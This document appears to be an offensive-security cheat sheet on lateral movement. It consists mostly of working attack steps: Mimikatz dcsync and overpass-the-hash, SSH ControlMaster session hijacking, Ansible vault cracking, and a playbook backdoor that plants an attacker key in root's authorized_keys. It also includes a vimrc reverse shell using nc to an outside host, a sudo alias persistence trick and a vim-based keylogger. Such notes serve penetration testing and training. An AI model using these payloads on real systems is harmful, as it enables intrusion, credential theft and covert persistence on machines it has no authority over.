Lateral Movement
Jump to other users inside the machine, don't jump into a hole for a long time.
Check Active Network Connection
Check possibility of hidden network or ports.
# Windows
netstat -antp
# linux
netstat -tulpn
Type of Lateral Movement:
Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash and bypass MFA for access to Windows
Lands on system via phishing
Mimikatz to bypass MFA --> use dcsync
lsadump::dcsync /user:<current user>
# get the HASH from [Primary:Kerberos-Newer-Keys *] --> [Credentials] --> [aes256_hmac]
# overpass the hash
sekurlsa::pth /user:<current user> /domain:<domain> /aes256:<HASH>
# cmd appears as another user in the another machine
# access other computer
Enter-PSSession -ComputerName <other computer>
# ref: https://www.youtube.com/watch?v=Fmbp34dBuMc
Linux Lateral Movement with ControlMaster
ControlMaster is a feature that enables sharing of multiple SSH sessions over a single network connection. We have to wait for user to connect to controlmaster then hijact the session.
Check the current compromised linux machine:
cat ~/.ssh/config
# it seeems like this
Host *
ControlPath ~/.ssh/controlmaster/%r@%h:%p
ControlMaster auto
ControlPersist no/yes
Watch the session user logon in the folder ~/.ssh/controlmaster/
watch -d -n1 'ls -la ~/.ssh/controlmaster/'
there is new file come up like this:
# srw------ 1 <user> <user> 0 jan 1 <time> user@host:port
hijack it using this command in the current machine.
ssh user@host:port
# using -S for socket target.
ssh -S ~/.ssh/controlmaster/user\@host\:port user@host:port
Ansible
commonly user to run ansible is high privilege.
controller server must have /etc/ansible/hosts
or
check with ansible
command in the server.
cat /etc/passwd |grep ansible
Command
ansible <target machine> -a "whoami"
#ansibleadm
ansible <target machine> -a "whoami" --become
#root
#backdooring the root
playbook
/opt/playbooks
code execution on the target computer with playbooks
#rce.yml
- name: get rce
hosts: all
gather_facts: true
tasks:
- name: display remote code exec
debug:
msg: "hostname: {{ ansible_hostname }} and os: {{ ansible_distribution }}
run with this command
ansible-playbook rce.yml
yaml file sometimes contains password plain text and encrypted password
if encrypted:
$ANSIBLE_VAULT;1.1;AES256....
ansible2john.py ./test.yml > crackhash.txt
hashcat carackhash.txt --force --hash-type=16900 /usr/share/wordlists/rockyou.txt
upload the ansible hash vault to the compromized machine that install ansible-vault, save it to password.hash
cat password.hash | ansible-vault decrypt
# enter last cracked password with hashcat
Able to write the playbook.yaml?
add this to make a backdoor in the playbook.yaml
<snip>
become: yes
tasks:
<snip>
- name: make dir
file:
path: /root/.ssh
state: directory
mode: '0700'
owner: root
group: root
- name: build authorized key
file:
path: /root/.ssh/authorized_keys
state: touch
mode: '0600'
owner: root
group: root
- name: inject ssh key
lineinfile:
path: /root/.ssh/authorized_keys
line: "<ssh public key attacker>"
insertbefore: EOF
RCE
- name: RCE
shell: ping 10.10.x.y
async: 10
poll: 0
VIM Backdoor
Option 1
create ~/.vimrc
!<command>
:silent !nc 192.168.x.x 443 -e /bin/bash
Option 2
create ~/.vimrc
:silent !source /tmp/.vimrunscript
.vimrunscript contains the bash script.
#!/bin/bash
<command>
echo 'alias sudo="sudo -E"' >> .bashrc
VIM Keylogger
create ~/.vimrc
file:
:autocmd BufWritePost * :silent :w! >>/tmp/keyLogFromVim.txt
or this payload more advanced:
~/vimrc
:if $USER == "root"
:autocmd BufWritePost * :silent :w! >>/tmp/keyLogFromVim.txt
:endif
reference:
https://highon.coffee/blog/ssh-lateral-movement-cheat-sheet/
Last updated